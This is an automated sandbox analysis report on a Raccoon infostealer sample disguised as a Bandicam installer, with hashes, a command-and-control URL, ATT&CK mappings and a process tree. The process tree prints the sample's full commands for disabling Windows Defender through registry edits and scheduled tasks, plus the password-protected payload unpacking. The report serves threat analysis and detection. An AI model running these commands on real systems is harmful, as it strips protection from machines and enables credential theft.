raccoon | 4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e

Analysis

max time kernel
129s
max time network
179s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
08-05-2022 22:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.exe
Size

29.1MB
MD5

a69ca58954d7445eb263e31fc1108354
SHA1

259e73e142f1a03c5c05ebe8c6f63d81eb9576ce
SHA256

4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e
SHA512

8b90ba61b38b340149c9b8d96ccbf76559e7469ddbcfc07ae33976a8cec7f1f0aa9d6eeb50d4530c0ee5ff5a2c507788a4077db2b8c1be9b8c5237e840dd70b6

Score

10^/10

raccoon c763e433ef51ff4b6c545800e4ba3b3b1a2ea077 evasion stealer themida trojan

Malware Config

Extracted

Family

raccoon

Botnet

c763e433ef51ff4b6c545800e4ba3b3b1a2ea077

Attributes

url4cnc
https://telete.in/jbitchsucks

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Raccoon Stealer Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1616-260-0x0000000000700000-0x0000000000793000-memory.dmp	family_raccoon
behavioral2/memory/1616-263-0x0000000000700000-0x0000000000793000-memory.dmp	family_raccoon
behavioral2/memory/1616-266-0x0000000000700000-0x0000000000793000-memory.dmp	family_raccoon

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Executes dropped EXE 17 IoCs

Processes:

4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmpBandicam.4.5.8.1673.exeBandicam.4.5.8.1673.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7852_protected.exe7852_protected.exe

pid	process
4800	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp
2968	Bandicam.4.5.8.1673.exe
4912	Bandicam.4.5.8.1673.tmp
4712	7z.exe
4632	7z.exe
5064	7z.exe
4740	7z.exe
4812	7z.exe
404	7z.exe
4044	7z.exe
2316	7z.exe
2928	7z.exe
4760	7z.exe
4768	7z.exe
3080	7z.exe
1468	7852_protected.exe
1616	7852_protected.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

7852_protected.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7852_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7852_protected.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmpWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	WScript.exe

Loads dropped DLL 19 IoCs

Processes:

4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmpBandicam.4.5.8.1673.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7852_protected.exe

pid	process
4800	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp
4912	Bandicam.4.5.8.1673.tmp
4912	Bandicam.4.5.8.1673.tmp
4912	Bandicam.4.5.8.1673.tmp
4912	Bandicam.4.5.8.1673.tmp
4712	7z.exe
4632	7z.exe
5064	7z.exe
4740	7z.exe
4812	7z.exe
404	7z.exe
4044	7z.exe
2316	7z.exe
2928	7z.exe
4760	7z.exe
4768	7z.exe
3080	7z.exe
1468	7852_protected.exe
1468	7852_protected.exe

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\ProgramData\sgbY\extracted\7852_protected.exe	themida
C:\ProgramData\sgbY\7852_protected.exe	themida
behavioral2/memory/1468-247-0x0000000000F00000-0x00000000014A0000-memory.dmp	themida
behavioral2/memory/1468-248-0x0000000000F00000-0x00000000014A0000-memory.dmp	themida
C:\ProgramData\sgbY\7852_protected.exe	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

7852_protected.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7852_protected.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

7852_protected.exe

description pid process target process

PID 1468 set thread context of 1616 1468 7852_protected.exe 7852_protected.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7852_protected.exe

description	pid	process	target process
PID 1468 set thread context of 1616	1468	7852_protected.exe	7852_protected.exe

Drops file in Program Files directory 2 IoCs

Processes:

4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp

description	ioc	process
File opened for modification	C:\Program Files (x86)\Bandicam.4.5.8.1673.exe	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp
File created	C:\Program Files (x86)\is-R5NJ1.tmp	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4084 1616 WerFault.exe 7852_protected.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4736 timeout.exe

pid	pid_target	process	target process
4084	1616	WerFault.exe	7852_protected.exe

pid	process
4736	timeout.exe

Modifies registry class 1 IoCs

Processes:

4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmpBandicam.4.5.8.1673.tmp7852_protected.exe

pid	process
4800	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp
4800	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp
4912	Bandicam.4.5.8.1673.tmp
4912	Bandicam.4.5.8.1673.tmp
1468	7852_protected.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7852_protected.exe

description	pid	process
Token: SeRestorePrivilege	4712	7z.exe
Token: 35	4712	7z.exe
Token: SeSecurityPrivilege	4712	7z.exe
Token: SeSecurityPrivilege	4712	7z.exe
Token: SeRestorePrivilege	4632	7z.exe
Token: 35	4632	7z.exe
Token: SeSecurityPrivilege	4632	7z.exe
Token: SeSecurityPrivilege	4632	7z.exe
Token: SeRestorePrivilege	5064	7z.exe
Token: 35	5064	7z.exe
Token: SeSecurityPrivilege	5064	7z.exe
Token: SeSecurityPrivilege	5064	7z.exe
Token: SeRestorePrivilege	4740	7z.exe
Token: 35	4740	7z.exe
Token: SeSecurityPrivilege	4740	7z.exe
Token: SeSecurityPrivilege	4740	7z.exe
Token: SeRestorePrivilege	4812	7z.exe
Token: 35	4812	7z.exe
Token: SeSecurityPrivilege	4812	7z.exe
Token: SeSecurityPrivilege	4812	7z.exe
Token: SeRestorePrivilege	404	7z.exe
Token: 35	404	7z.exe
Token: SeSecurityPrivilege	404	7z.exe
Token: SeSecurityPrivilege	404	7z.exe
Token: SeRestorePrivilege	4044	7z.exe
Token: 35	4044	7z.exe
Token: SeSecurityPrivilege	4044	7z.exe
Token: SeSecurityPrivilege	4044	7z.exe
Token: SeRestorePrivilege	2316	7z.exe
Token: 35	2316	7z.exe
Token: SeSecurityPrivilege	2316	7z.exe
Token: SeSecurityPrivilege	2316	7z.exe
Token: SeRestorePrivilege	2928	7z.exe
Token: 35	2928	7z.exe
Token: SeSecurityPrivilege	2928	7z.exe
Token: SeSecurityPrivilege	2928	7z.exe
Token: SeRestorePrivilege	4760	7z.exe
Token: 35	4760	7z.exe
Token: SeSecurityPrivilege	4760	7z.exe
Token: SeSecurityPrivilege	4760	7z.exe
Token: SeRestorePrivilege	4768	7z.exe
Token: 35	4768	7z.exe
Token: SeSecurityPrivilege	4768	7z.exe
Token: SeSecurityPrivilege	4768	7z.exe
Token: SeRestorePrivilege	3080	7z.exe
Token: 35	3080	7z.exe
Token: SeSecurityPrivilege	3080	7z.exe
Token: SeSecurityPrivilege	3080	7z.exe
Token: SeDebugPrivilege	1468	7852_protected.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp

pid process

4800 4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.exe4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmpBandicam.4.5.8.1673.exeWScript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4484 wrote to memory of 4800	4484	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.exe	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp
PID 4484 wrote to memory of 4800	4484	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.exe	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp
PID 4484 wrote to memory of 4800	4484	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.exe	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp
PID 4800 wrote to memory of 2968	4800	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp	Bandicam.4.5.8.1673.exe
PID 4800 wrote to memory of 2968	4800	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp	Bandicam.4.5.8.1673.exe
PID 4800 wrote to memory of 2968	4800	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp	Bandicam.4.5.8.1673.exe
PID 2968 wrote to memory of 4912	2968	Bandicam.4.5.8.1673.exe	Bandicam.4.5.8.1673.tmp
PID 2968 wrote to memory of 4912	2968	Bandicam.4.5.8.1673.exe	Bandicam.4.5.8.1673.tmp
PID 2968 wrote to memory of 4912	2968	Bandicam.4.5.8.1673.exe	Bandicam.4.5.8.1673.tmp
PID 4800 wrote to memory of 5012	4800	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp	WScript.exe
PID 4800 wrote to memory of 5012	4800	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp	WScript.exe
PID 4800 wrote to memory of 5012	4800	4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp	WScript.exe
PID 5012 wrote to memory of 1460	5012	WScript.exe	cmd.exe
PID 5012 wrote to memory of 1460	5012	WScript.exe	cmd.exe
PID 5012 wrote to memory of 1460	5012	WScript.exe	cmd.exe
PID 1460 wrote to memory of 3876	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 3876	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 3876	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 1356	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 1356	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 1356	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 1640	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 1640	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 1640	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 3696	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 3696	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 3696	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4200	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4200	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4200	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4400	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4400	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4400	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4412	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4412	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4412	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4372	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4372	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4372	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 3440	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 3440	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 3440	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 3528	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 3528	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 3528	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4224	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4224	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 4224	1460	cmd.exe	reg.exe
PID 5012 wrote to memory of 1076	5012	WScript.exe	cmd.exe
PID 5012 wrote to memory of 1076	5012	WScript.exe	cmd.exe
PID 5012 wrote to memory of 1076	5012	WScript.exe	cmd.exe
PID 5012 wrote to memory of 1136	5012	WScript.exe	cmd.exe
PID 5012 wrote to memory of 1136	5012	WScript.exe	cmd.exe
PID 5012 wrote to memory of 1136	5012	WScript.exe	cmd.exe
PID 1460 wrote to memory of 1600	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 1600	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 1600	1460	cmd.exe	reg.exe
PID 1136 wrote to memory of 4736	1136	cmd.exe	timeout.exe
PID 1136 wrote to memory of 4736	1136	cmd.exe	timeout.exe
PID 1136 wrote to memory of 4736	1136	cmd.exe	timeout.exe
PID 1460 wrote to memory of 3268	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 3268	1460	cmd.exe	reg.exe
PID 1460 wrote to memory of 3268	1460	cmd.exe	reg.exe
PID 1076 wrote to memory of 1216	1076	cmd.exe	mode.com

C:\Users\Admin\AppData\Local\Temp\4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.exe
"C:\Users\Admin\AppData\Local\Temp\4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4484

C:\Users\Admin\AppData\Local\Temp\is-8V89B.tmp\4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8V89B.tmp\4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.tmp" /SL5="$801F2,29818500,760832,C:\Users\Admin\AppData\Local\Temp\4e9bb54bbb01a7f5719dcbaa86cbc0be9715f25ba4c1cac686fbdd170c46c94e.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4800

C:\Program Files (x86)\Bandicam.4.5.8.1673.exe
"C:\Program Files (x86)\Bandicam.4.5.8.1673.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2968

C:\Users\Admin\AppData\Local\Temp\is-SQL3S.tmp\Bandicam.4.5.8.1673.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SQL3S.tmp\Bandicam.4.5.8.1673.tmp" /SL5="$20202,22575714,93696,C:\Program Files (x86)\Bandicam.4.5.8.1673.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4912

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\sgbY\MMF.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\sgbY\DisableOAVProtection.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1460

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
5⤵
PID:3876

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
5⤵
PID:1356

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
5⤵
PID:1640

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
5⤵
PID:3696

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:4200

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
5⤵
PID:4400

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
5⤵
PID:4412

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:4372

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
5⤵
PID:3440

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
5⤵
PID:3528

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
5⤵
PID:4224

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
5⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
5⤵
PID:3268

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:1808

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:4212

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
5⤵
PID:3692

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
5⤵
PID:5084

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
5⤵
PID:2596

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
5⤵
PID:2728

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
5⤵
PID:448

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
5⤵
PID:1212

C:\Windows\SysWOW64\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
5⤵
PID:2276

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
5⤵
PID:4196

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:2544

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:2380

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:1948

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:3152

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:3032

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:1940

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:1844

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
5⤵
- Modifies security service
PID:4524

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:3800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\sgbY\main.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1076

C:\Windows\SysWOW64\mode.com
mode 65,10
5⤵
PID:1216

C:\ProgramData\sgbY\7z.exe
7z.exe e file.zip -p___________27657pwd11724pwd30475___________ -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4712

C:\ProgramData\sgbY\7z.exe
7z.exe e extracted/file_11.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4632

C:\ProgramData\sgbY\7z.exe
7z.exe e extracted/file_10.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5064

C:\ProgramData\sgbY\7z.exe
7z.exe e extracted/file_9.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4740

C:\ProgramData\sgbY\7z.exe
7z.exe e extracted/file_8.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4812

C:\ProgramData\sgbY\7z.exe
7z.exe e extracted/file_7.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:404

C:\ProgramData\sgbY\7z.exe
7z.exe e extracted/file_6.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4044

C:\ProgramData\sgbY\7z.exe
7z.exe e extracted/file_5.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2316

C:\ProgramData\sgbY\7z.exe
7z.exe e extracted/file_4.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2928

C:\ProgramData\sgbY\7z.exe
7z.exe e extracted/file_3.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4760

C:\ProgramData\sgbY\7z.exe
7z.exe e extracted/file_2.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4768

C:\ProgramData\sgbY\7z.exe
7z.exe e extracted/file_1.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3080

C:\ProgramData\sgbY\7852_protected.exe
"7852_protected.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468

C:\ProgramData\sgbY\7852_protected.exe
"7852_protected.exe"
6⤵
- Executes dropped EXE
PID:1616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 488
7⤵
- Program crash
PID:4084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\sgbY\DiskRemoval.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1136

C:\Windows\SysWOW64\timeout.exe
timeout /T 60 /NOBREAK
5⤵
- Delays execution with timeout.exe
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1616 -ip 1616
1⤵
PID:2004

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Bandicam.4.5.8.1673.exe
Filesize
21.9MB

MD5
a6627fb2c2e3874325259bf000571fdf

SHA1
3d521136f3445aae539080e74a80d40a67d543a2

SHA256
dbc86639649df20836a209414eeaed1e83b4e0d26d82f5e94c671d36d9da7738

SHA512
122a996be74b2a971fac731a6058e59d2c57497db52ced2e6a8ad46e81c367111a0e3a0d32dfc585a77b43d84d7e0b1e7a00f465e8f9ad66d63df1fe309bdca3

Download Submit
C:\Program Files (x86)\Bandicam.4.5.8.1673.exe
Filesize
21.9MB

MD5
a6627fb2c2e3874325259bf000571fdf

SHA1
3d521136f3445aae539080e74a80d40a67d543a2

SHA256
dbc86639649df20836a209414eeaed1e83b4e0d26d82f5e94c671d36d9da7738

SHA512
122a996be74b2a971fac731a6058e59d2c57497db52ced2e6a8ad46e81c367111a0e3a0d32dfc585a77b43d84d7e0b1e7a00f465e8f9ad66d63df1fe309bdca3

Download Submit
C:\ProgramData\sgbY\7852_protected.exe
Filesize
5.4MB

MD5
01b0d33ee024c172df883c1ec2a2b3db

SHA1
8b82450b9849452e90e37221eedb0eb391d3a6e8

SHA256
d56dc8166f5675238a118a62949cfb03504de1acbca39095aec27cfcb6168985

SHA512
d1f82135c5c474c8f9071d2b24f16fa3c03f5a171bb6b474ab0dd6b8ade898000828b956e06f9e0025cdadd9d7d18e6d19edb123994c8268efff2449a636ca33

Download Submit
C:\ProgramData\sgbY\7852_protected.exe
Filesize
5.4MB

MD5
01b0d33ee024c172df883c1ec2a2b3db

SHA1
8b82450b9849452e90e37221eedb0eb391d3a6e8

SHA256
d56dc8166f5675238a118a62949cfb03504de1acbca39095aec27cfcb6168985
